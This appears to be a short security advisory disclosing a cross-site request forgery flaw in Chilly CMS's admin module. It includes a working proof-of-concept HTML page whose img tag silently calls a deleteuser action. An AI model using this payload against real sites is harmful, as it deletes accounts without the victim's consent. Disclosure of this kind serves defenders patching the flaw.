Chilly CMS suffers from a cross site request forgery vulnerability.
18882fe7f03d793e245d10395a0509c4fe3f749e2ac9ca591eaff91581b53241
=======================================================================
chilly_CMS CSRF Vulnerability
=======================================================================
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software chilly_CMS
# Category CMS / Portals
# Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
# Plateform php
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
# Proof of concept #
Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS
Script to Delete the Admin user through Cross Site request forgery
. ................................................................................................................
<html>
<body>
<img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that a added content is deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.